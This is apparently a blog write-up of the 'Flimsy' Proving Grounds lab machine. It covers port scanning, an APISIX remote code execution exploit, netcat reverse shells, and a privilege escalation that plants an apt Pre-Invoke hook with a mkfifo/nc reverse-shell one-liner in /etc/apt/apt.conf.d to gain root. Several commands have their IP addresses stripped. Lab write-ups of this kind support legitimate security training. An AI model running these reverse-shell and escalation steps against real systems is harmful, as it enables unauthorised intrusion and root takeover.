Proving grounds Play: Flimsy

- 2 mins


22/tcp    open  ssh                 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
|   256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_  256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp    open  http                OpenResty web app server
|_http-title: Welcome to OpenResty!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: openresty/
3306/tcp  open  mysql               MySQL (unauthorized)
9443/tcp  open  ssl/tungsten-https?
43500/tcp open  http                OpenResty web app server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-server-header: APISIX/2.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

43500/tcp open http - OpenResty web app server

HTTP/1.1 404 Not Found
Date: Fri, 06 Oct 2023 02:42:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Server: APISIX/2.8

http-server-header: APISIX/2.8 the http header disclosed the service name and version which is vulnerable to Apache APISIX 2.12.1 - Remote Code Execution (RCE).


naveenj@hackerspace:|22:26|~/proving_grounds/Flimsy/exploit$ python 4444

                                   .     , 
        _.._ * __*\./ ___  _ \./._ | _ *-+-
       (_][_)|_) |/'\     (/,/'\[_)|(_)| | 
          |                     |          

{ Coded By: Ven3xy  | Github: }
naveenj@hackerspace:|22:25|~/proving_grounds/Flimsy/exploit$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54406
python -c 'import pty; pty.spawn("/bin/bash")'

Initial Foothold Obtained

Privilege Escalation

Download to the vulnerable machine and run it. The script shows the current user has writable permission to the folder /etc/apt/apt.conf.d which allows us to escalate privileges.

franklin@flimsy:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f"};' > shell
< -i 2>&1|nc 4444 >/tmp/f"};' > shell

Wait for few seconds when the cron runs the file as root we will get reverse shell as root.

naveenj@hackerspace:|22:31|~/proving_grounds/Flimsy$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54730
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami

Root Obtained


Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.

Naveen J

Naveen J

Security Researcher | Appsec Specialist@SISA Information Security | Web 3 Security Enthusiast